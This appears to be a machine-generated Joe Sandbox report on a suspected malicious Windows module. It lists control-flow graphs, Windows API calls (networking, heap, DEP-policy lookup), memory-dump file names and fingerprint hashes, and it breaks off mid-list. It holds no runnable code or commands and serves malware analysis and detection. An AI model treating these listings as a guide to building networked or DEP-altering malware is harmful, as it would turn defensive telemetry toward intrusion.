                            control_flow_graph 229 6caf07b0-6caf07cb 230 6caf07d1-6caf07d8 229->230 231 6caf0860-6caf086c socket 229->231 233 6caf07de 230->233 234 6caf07da-6caf07dc 230->234 232 6caf086f-6caf087e call 6cc01243 231->232 236 6caf07e0-6caf07e9 gethostbyname 233->236 234->236 238 6caf07eb-6caf07f6 WSAGetLastError 236->238 239 6caf0856-6caf085d 236->239 238->232 240 6caf07f8-6caf080c WSAStartup 238->240 239->231 240->232 241 6caf080e-6caf0812 240->241 242 6caf0818 241->242 243 6caf0814-6caf0816 241->243 244 6caf081a-6caf082a gethostbyname 242->244 243->244 244->239 245 6caf082c-6caf0830 244->245 246 6caf0834-6caf0854 inet_addr gethostbyaddr 245->246 247 6caf0832 245->247 246->232 246->239 247->246
                            APIs
                            • gethostbyname.WS2_32(00000040), ref: 6CAF07E1
                            • WSAGetLastError.WS2_32 ref: 6CAF07EB
                            • WSAStartup.WS2_32(00000101,?), ref: 6CAF0804
                            • gethostbyname.WS2_32(00000040), ref: 6CAF081B
                            • inet_addr.WS2_32(00000040), ref: 6CAF0835
                            • gethostbyaddr.WS2_32(?,00000004,00000002), ref: 6CAF084C
                            • socket.WS2_32(00000002,00000002,00000000), ref: 6CAF0866
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: gethostbyname$ErrorLastStartupgethostbyaddrinet_addrsocket
                            • String ID:
                            • API String ID: 1331971487-0
                            • Opcode ID: fc0547b2517a2d2d28b825706e8c2cbeb8950c5d260830b3fffb045085c5ef67
                            • Instruction ID: 2d1882b8b1dd31f45cfc77972c499eaa95b99ddec5edc0353b94b652d102d0bc
                            • Opcode Fuzzy Hash: fc0547b2517a2d2d28b825706e8c2cbeb8950c5d260830b3fffb045085c5ef67
                            • Instruction Fuzzy Hash: 7D217930B01658AFEB218F2AC80DB9AB7B8FF06714F040059F915CBA80DB70E885CBD1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 248 6cc6f2e0-6cc6f30f 249 6cc6f315-6cc6f31c TlsGetValue 248->249 250 6cc6f311-6cc6f313 248->250 251 6cc6f31e-6cc6f332 249->251 250->251 252 6cc6f334-6cc6f33b 251->252 253 6cc6f365-6cc6f36f 251->253 254 6cc6f3a5-6cc6f3a7 252->254 255 6cc6f33d-6cc6f33f 252->255 256 6cc6f391-6cc6f3a4 253->256 257 6cc6f371-6cc6f37b 253->257 261 6cc6f3ea-6cc6f3ee 254->261 262 6cc6f3a9 254->262 258 6cc6f3b0-6cc6f3ba 255->258 259 6cc6f341-6cc6f346 255->259 257->256 260 6cc6f37d-6cc6f38f GetProcessHeap HeapFree 257->260 265 6cc6f3d7-6cc6f3e8 GetProcessHeap HeapFree 258->265 266 6cc6f3bc-6cc6f3d5 GetProcessHeap HeapFree 258->266 263 6cc6f34b call 6cc6e4c0 259->263 260->256 261->252 264 6cc6f3f4-6cc6f3fe 261->264 262->258 267 6cc6f350-6cc6f35b 263->267 268 6cc6f400-6cc6f405 264->268 269 6cc6f40d-6cc6f41f call 6c877fe0 264->269 265->258 265->261 266->265 267->253 272 6cc6f35d-6cc6f35f TlsSetValue 267->272 268->269 273 6cc6f407-6cc6f409 268->273 269->264 277 6cc6f421 269->277 272->253 273->269 277->252
                            APIs
                            • TlsGetValue.KERNEL32(FFFFFFFF,D2AB1C0E,?,?,?,?,000000FF,6CC6F50A), ref: 6CC6F316
                            • TlsSetValue.KERNEL32(FFFFFFFF,6CC6F50A), ref: 6CC6F35F
                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6CC6F388
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6CC6F38F
                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6CC6F3CE
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6CC6F3D5
                            • GetProcessHeap.KERNEL32(00000000,6CC6F50A,?,?), ref: 6CC6F3DA
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6CC6F3E1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: Heap$FreeProcess$Value
                            • String ID:
                            • API String ID: 3709577838-0
                            • Opcode ID: bca5198a5640a1c7ca109c47dea20c8c6da601750a40f3102d1dcf99ef24ee25
                            • Instruction ID: 238a831ff15866fa79a2ab302de81af5867a5544d269b3228ad3d1cd2a47fdc6
                            • Opcode Fuzzy Hash: bca5198a5640a1c7ca109c47dea20c8c6da601750a40f3102d1dcf99ef24ee25
                            • Instruction Fuzzy Hash: 3E41C0716053009FDB50CF6ADAC4B16B7B8FF45729F104669F9259BE80E730E804CBA1

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: Xtime_diff_to_millis2_xtime_get
                            • String ID: <
                            • API String ID: 531285432-4251816714
                            • Opcode ID: a45b4e5132f33d04fd2c47fe84b95b4b018acd37d78da1fefd97d7528b6cbd6b
                            • Instruction ID: b65cfc761aaae76f989c31bed39b61be0eba7eb4467c4e725a2f2b1dd6715b25
                            • Opcode Fuzzy Hash: a45b4e5132f33d04fd2c47fe84b95b4b018acd37d78da1fefd97d7528b6cbd6b
                            • Instruction Fuzzy Hash: CF117FB19087449BD710DB64C844BDAB7E8BF4931CF008E2EE59997690E735E148CB52

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 358 6c8ecf70-6c8ecf89 GetModuleHandleA GetProcAddress 359 6c8ecf8b-6c8ecf95 358->359 360 6c8ecf96-6c8ecfa0 358->360
                            APIs
                            • GetModuleHandleA.KERNEL32(Kernel32.dll,SetProcessDEPPolicy), ref: 6C8ECF7A
                            • GetProcAddress.KERNEL32(00000000), ref: 6C8ECF81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: Kernel32.dll$SetProcessDEPPolicy
                            • API String ID: 1646373207-3431537735
                            • Opcode ID: db0b9ce5706c1e198bf01f59035a2f7b185094f10f40f082fceec1b8c93a6ba6
                            • Instruction ID: 9475f6a4486fcb98534510c9a3955c6da320817973490d591418d26b3958b834
                            • Opcode Fuzzy Hash: db0b9ce5706c1e198bf01f59035a2f7b185094f10f40f082fceec1b8c93a6ba6
                            • Instruction Fuzzy Hash: 2ED09E78605200AFDB409FA0C944B097AF4AF8A701F604844B529C7640CBB4D905EA11
                            APIs
                            • EnterCriticalSection.KERNEL32(6D00ABE4,6D00ABB0,00000000,6D00ABE4,?,00000000), ref: 6CA6DC6F
                            • LeaveCriticalSection.KERNEL32(6D00ABE4,?,?,00000000), ref: 6CA6DCB6
                            • LeaveCriticalSection.KERNEL32(6D00ABE4,?,?,00000000), ref: 6CA6DCC9
                            • LeaveCriticalSection.KERNEL32(6D00ABE4,?,00000000), ref: 6CA6DCEA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: CriticalSection$Leave$Enter
                            • String ID:
                            • API String ID: 2978645861-0
                            • Opcode ID: 37a9ad072d227c40d88332fdfdbb52c9736360dd035dbced2d8d366365873b6e
                            • Instruction ID: a85553d4fd6e6de3f41f466681146a1d30c174a7d8c5c03c3c47aeeae2446782
                            • Opcode Fuzzy Hash: 37a9ad072d227c40d88332fdfdbb52c9736360dd035dbced2d8d366365873b6e
                            • Instruction Fuzzy Hash: B821C376B006048BC7109F6AE844956F3F9FBC9236755036AEA1AC3A40D731F859CBE0
                            APIs
                            • _com_issue_errorex.COMSUPP ref: 6C8A2F41
                            • _com_issue_errorex.COMSUPP ref: 6C8A2F71
                            • _com_issue_errorex.COMSUPP ref: 6C8A2FE2
                            • _com_issue_errorex.COMSUPP ref: 6C8A3012
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: _com_issue_errorex
                            • String ID:
                            • API String ID: 79918163-0
                            • Opcode ID: dff01f0b843afd706c4cf4fe74715c0577e237daaf12a0e2548e98fb9b61092a
                            • Instruction ID: cc09075cd2a7a8b12bfe85952e8d634936cf4ffe8f721bdda095f7c2ea0d8dd8
                            • Opcode Fuzzy Hash: dff01f0b843afd706c4cf4fe74715c0577e237daaf12a0e2548e98fb9b61092a
                            • Instruction Fuzzy Hash: 13419D70604701AFD7319FA2CA48F5BB7B8EF44B18F20491DE45AA7A50E778A905CBA1
                            APIs
                            • __time64.LIBCMT ref: 6CA66967
                              • Part of subcall function 6CC04D55: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,6C8E5FCA,00000000,00000000,6C8E6655,?,?,00000000,?,00000000), ref: 6CC04D5E
                              • Part of subcall function 6CC04D55: __aulldiv.LIBCMT ref: 6CC04D7E
                              • Part of subcall function 6CA663E0: HeapCreate.KERNEL32(00000005,00000000,00000000,00000000,?,6CA669A5), ref: 6CA663F1
                              • Part of subcall function 6CA663E0: HeapAlloc.KERNEL32(00000000,00000008,00000648,00000000,?,6CA669A5), ref: 6CA66404
                              • Part of subcall function 6CA663E0: CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000001,?,6CA669A5), ref: 6CA66418
                              • Part of subcall function 6CA663E0: HeapFree.KERNEL32(00000000,00000000,?,6CA669A5), ref: 6CA6642C
                            • _free.LIBCMT ref: 6CA669C5
                            • _free.LIBCMT ref: 6CA669CD
                            • _free.LIBCMT ref: 6CA669D3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
